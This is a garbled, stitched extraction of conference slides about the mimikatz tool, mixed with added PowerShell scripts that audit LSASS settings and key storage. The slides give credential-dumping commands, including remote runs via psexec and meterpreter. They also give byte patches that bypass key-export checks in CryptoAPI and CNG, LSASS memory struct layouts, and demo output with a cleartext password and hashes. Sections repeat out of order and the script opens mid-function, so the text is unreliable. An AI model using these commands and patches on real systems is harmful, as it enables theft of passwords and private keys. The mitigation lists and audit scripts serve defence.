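                $provider   = $rsa.CspKeyContainerInfo.ProviderName
                $exportable = $rsa.CspKeyContainerInfo.Exportable
                $plaintext  = $exportable                    # CAPI has a single exportable flag
            }
            # Non-RSA keys (e.g. ECDSA) stay at Api = unknown; the talk only covers RSA.

            if ($softwareProviders -contains $provider) { $keyClass = 'software: key material reachable in memory' }
            elseif ($hardwareProviders -contains $provider) { $keyClass = 'hardware-backed' }
            else { $keyClass = 'unclassified: review the vendor CSP/KSP' }

            [pscustomobject]@{
                Store           = $path
                Subject         = $cert.Subject
                Thumbprint      = $cert.Thumbprint
                Api             = $api
                Provider        = $provider
                Exportable      = $exportable
                PlaintextExport = $plaintext
                KeyClass        = $keyClass
            }
        }
    }
}

# Usage: software-backed keys first, since those are the ones the patch slides concern.
Get-PrivateKeyProtectionReport | Sort-Object KeyClass, Store | Format-Table -AutoSize -Wrap
```

A key reported as not exportable in a software provider is still only protected by the check the talk patches; moving it to a hardware-backed provider is the change this slide asks for.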
mimikatz :: what else can it do?

– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • …
– …
mimikatz :: that's all folks!

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft, for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
Blog, Source Code & Contact

blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz
email     benjamin@gentilkiwi.com
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz / sekurlsa / what we can do?

Basics
- No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
- No admin rights, system rights, debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke, so useless :))
- For privileged accounts: network logon instead of interactive (when possible)
- Audit: pass-the-hash keeps traces and can lock accounts
- No admin rights, system rights, debug privileges, even for VIPs
- Use a separated network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- No exotic
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
- Stop shared secrets for authentication, push public/private stuff (like keys :))
- Let opportunities to stop retro-compatibility
- Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
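An added defender-side check, not from the slides, that reads the local LSA settings behind several of the mitigations above (which authentication packages are loaded, LM hash storage, NTLM restriction). Registry paths and value names are the standard Windows ones; the package names are the ones the talk discusses.

```powershell
# Added example, not from the slides: read the local LSA settings behind several of the
# mitigations listed above (loaded authentication packages, LM hash storage, NTLM restriction).
# Registry paths and value names are the standard Windows ones; package names come from the slides.
function Get-LsaCredentialExposure {
    $lsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $lsa    = Get-ItemProperty -Path $lsaKey
    $msv    = Get-ItemProperty -Path (Join-Path $lsaKey 'MSV1_0') -ErrorAction SilentlyContinue

    # Packages the sekurlsa output above shows keeping the clear-text password in LSASS and
    # that the slides say can be disabled; kerberos and msv1_0 keep secrets too but cannot be removed.
    $plaintextPackages = @('wdigest', 'tspkg', 'livessp')

    $findings = @()

    # 'Security Packages' is REG_MULTI_SZ: one SSP/AP name per entry (blank entries occur).
    foreach ($pkg in @($lsa.'Security Packages')) {
        if ([string]::IsNullOrWhiteSpace($pkg)) { continue }
        $issue = ''
        if ($plaintextPackages -contains $pkg.ToLower()) { $issue = 'keeps a reversible copy of the password in LSASS' }
        $findings += [pscustomobject]@{ Check = "Security package '$pkg'"; Value = 'loaded'; Issue = $issue }
    }

    # NoLMHash = 1 stops storing the LM hash (visible as "Hash LM" in the sekurlsa output) at next password change.
    $issue = ''
    if ($lsa.NoLMHash -ne 1) { $issue = 'LM hashes are still stored' }
    $findings += [pscustomobject]@{ Check = 'NoLMHash'; Value = $lsa.NoLMHash; Issue = $issue }

    # LmCompatibilityLevel 5 = send NTLMv2 only, refuse LM and NTLMv1.
    $issue = ''
    if ($lsa.LmCompatibilityLevel -lt 5) { $issue = 'LM/NTLMv1 responses still sent or accepted' }
    $findings += [pscustomobject]@{ Check = 'LmCompatibilityLevel'; Value = $lsa.LmCompatibilityLevel; Issue = $issue }

    # "Disable NTLM (available with NT6)": the restrict-NTLM policies, 0 = allow all, 2 = deny all.
    foreach ($name in 'RestrictSendingNTLMTraffic', 'RestrictReceivingNTLMTraffic') {
        $value = if ($null -ne $msv) { $msv.$name } else { $null }
        $issue = ''
        if ($value -ne 2) { $issue = 'NTLM is not denied' }
        $findings += [pscustomobject]@{ Check = $name; Value = $value; Issue = $issue }
    }

    return $findings
}

# Print the table; rows with a non-empty Issue are the ones to act on.
Get-LsaCredentialExposure | Format-Table -AutoSize
```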
mimikatz / crypto / what is it?

A little module that I wrote to
- play with Windows Cryptographic API, CNG and RSA keys
- automate export of certificates/keys
  • even those which are "not" exportable

What the crypto module can do
- List
  • Providers
  • Stores
  • Certificates
  • Keys
- Export
  • Certificates
    - public, in DER format
    - with private keys, in PFX format
  • Private keys in PVK format (it's cool, OpenSSL can deal with it too)
- Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again :))
mod_mimikatz_crypto
mimikatz / crypto / how it's protected?

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  • at least without the master keys and/or passwords of the users

Computer/User can load their own keys because they have enough secrets to do it (e.g. session opened)
- Yes, a computer/server opens a "session"

Export/Usage can be limited by
- Password
- Popup
- Export/Archive flag not present
Constraint for most users; unavailable for computer keys:
  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz / crypto / capi / how it works?

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader, ...
- cryptdll.dll, rsaenh.dll, ...

Processes deal with cryptographic keys through this API...
mimikatz / crypto / capi / how it's exported ( level)
[Diagram: Process asks CryptoAPI and the RSA CSP to export a key ("Ask to export Key"); the CSP loads the private key (DPAPI decode); if Exportable = yes: Exported Key; if no: NTE_BAD_KEY_STATE. Label: PLAYSKOOL]
mimikatz / crypto / patchcapi / because I own my process

When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz / crypto / patchcapi / because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz     continue_key_export_or_archive

.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp     continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz     continue_key_export_or_archive_prepare

.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp     continue_key_export_or_archive_prepare
mimikatz / crypto / patchcapi / demo time!

Import, export, import as not exportable... export.
mimikatz / crypto / patchcapi / limitations

Because
- I'm lazy
- I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little...

mimikatz crypto::patchcapi only deals with
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz / crypto / cng / how it works?

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz / crypto / cng / how it's exported ( level)

[Diagram label: KeyIso Service (LSASS Process)]
[Diagram: Process asks CNG to export a key ("Ask to export Key"); the request goes over RPC to the KeyIso service inside LSASS (NT6: System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP), which loads the private key (DPAPI decode); if Exportable = yes: Exported Key; if no: NTE_NOT_SUPPORTED. Label: PLAYSKOOL]
mimikatz / crypto / patchcng / because sometimes I own LSASS

When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso): ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
mimikatz # crypto::exportKeys [user]
Clés CNG :
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) : L'opération demandée n'est pas prise en charge.
mimikatz / crypto / patchcng / because sometimes I own LSASS

This time, checks and keys are in the LSASS process... And what?
I wrote "1" byte in LSASS memory space...
.text:6C815210 75 1C                jnz     short continue_key_export

.text:6C815210 EB 1C                jmp     short continue_key_export
mimikatz / crypto / patchcng / demo time!

Import, export, import as not exportable... export again.
mimikatz / crypto / patchcng / limitations

Patch operation needs some privileges
- Admin (debug privilege)
- SYSTEM

mimikatz crypto::patchcng only deals with
- Microsoft Software Key Storage Provider (maybe other algorithms than RSA)

Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates... even those that are exportable (hu?)
- certutil can...
mimikatz / crypto / patchcng / bonus

After one admin has patched LSASS, all users of the current system benefit from the extra exports
- until reboot / KeyIso service restart

Some other programs that don't check the export flag before asking for an export can work too
- Yeah, like the good old certutil
Before:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil : -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil : Clé non valide pour l'utilisation dans l'état spécifié.

After:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[...]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil : -exportPFX La commande s'est terminée correctement.
mimikatz / crypto / memo

Some commands:
  mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
  mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
  mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit

Password
- PFX files are protected by this password: mimikatz

Keys
- When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
- When you delete a certificate, Windows does not delete its private key... funny, isn't it?
  • So yes, mimikatz can export it
mimikatz / crypto / what we can do?

Exactly the same as for sekurlsa: it will prevent access to accounts/computer
- no admin, no admin, no admin...

Basics
- Use smartcards/tokens for users' certificates
- Use Hardware Security Modules (HSM), even SoftHSM

More in depth
- See what Microsoft can do with TPM from Windows 8
  • Virtual SmartCard seems promising
- Verify vendors' implementation (Lenovo, Dell, ...) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy :)
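An added defender-side inventory, not part of the slides: it lists certificates with private keys in the machine and user personal stores, reports which CSP/KSP holds each key and whether it is marked exportable, and flags keys held by the software providers named in the talk, whose export flag is enforced only by code an administrator can patch, as opposed to smartcard or HSM-backed keys. It assumes Windows PowerShell on .NET Framework 4.6 or later (for RSACng) and only classifies RSA keys.

```powershell
# Added example, not from the slides: inventory private keys by provider and export flag.
# Assumes Windows PowerShell with .NET Framework 4.6+ (RSACng); non-RSA keys are reported as 'unknown'.
function Get-PrivateKeyInventory {
    param([string[]] $StorePath = @('Cert:\LocalMachine\My', 'Cert:\CurrentUser\My'))

    # Software providers listed on the slides: the CAPI ones all sit on rsaenh.dll, plus the software KSP.
    $softwareProviders = @(
        'Microsoft Base Cryptographic Provider v1.0',
        'Microsoft Enhanced Cryptographic Provider v1.0',
        'Microsoft Enhanced RSA and AES Cryptographic Provider',
        'Microsoft RSA SChannel Cryptographic Provider',
        'Microsoft Strong Cryptographic Provider',
        'Microsoft Software Key Storage Provider'
    )

    foreach ($path in $StorePath) {
        foreach ($cert in (Get-ChildItem -Path $path -ErrorAction SilentlyContinue)) {
            if (-not $cert.HasPrivateKey) { continue }
            $api = 'unknown'; $provider = $null; $exportable = $null

            # CAPI keys: .PrivateKey yields an RSACryptoServiceProvider with CSP container info.
            try {
                $capi = $cert.PrivateKey
                if ($capi -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    $api        = 'CAPI'
                    $provider   = $capi.CspKeyContainerInfo.ProviderName
                    $exportable = $capi.CspKeyContainerInfo.Exportable
                }
            } catch { }

            # CNG keys: .PrivateKey fails, so go through the RSA extension and read the CngKey.
            if ($api -eq 'unknown') {
                try {
                    $rsa = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                    if ($rsa -is [System.Security.Cryptography.RSACng]) {
                        $api        = 'CNG'
                        $provider   = $rsa.Key.Provider.Provider
                        $exportable = [bool]($rsa.Key.ExportPolicy -band
                                             [System.Security.Cryptography.CngExportPolicies]::AllowExport)
                    }
                } catch { }
            }

            [pscustomobject]@{
                Store       = $path
                Subject     = $cert.Subject
                Thumbprint  = $cert.Thumbprint
                Api         = $api
                Provider    = $provider
                Exportable  = $exportable
                # True = key material lives in software under DPAPI; the non-exportable flag is not a
                # boundary against a local admin (the point of the patchcapi/patchcng slides).
                SoftwareKey = ($provider -in $softwareProviders)
            }
        }
    }
}

# Software-backed keys first: candidates to move to a smartcard, token or HSM.
Get-PrivateKeyInventory | Sort-Object SoftwareKey -Descending | Format-Table -AutoSize
```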
mimikatz / what else can it do?

- Play with minesweeper
- Manipulate some handles
- Pass the hash
- Dump SAM / AD
- Stop event monitoring
- Patch Terminal Server
- Basic GPO bypass
- Applocker / SRP bypass
- Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • ...
- ...
mimikatz / that's all folks!

Thanks to
- my girlfriend for her support (her LSASS crashed a few times)
- Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
- Microsoft for always considering it as normal/acceptable
- Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, ...
- You, for your attention

Questions?
Don't be shy :)
... especially if you have written the corresponding slide number
Blog, Source Code & Contact

blog      http://blog.gentilkiwi.com
mimikatz  http://blog.gentilkiwi.com/mimikatz
source    https://code.google.com/p/mimikatz
email     benjamin@gentilkiwi.com
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
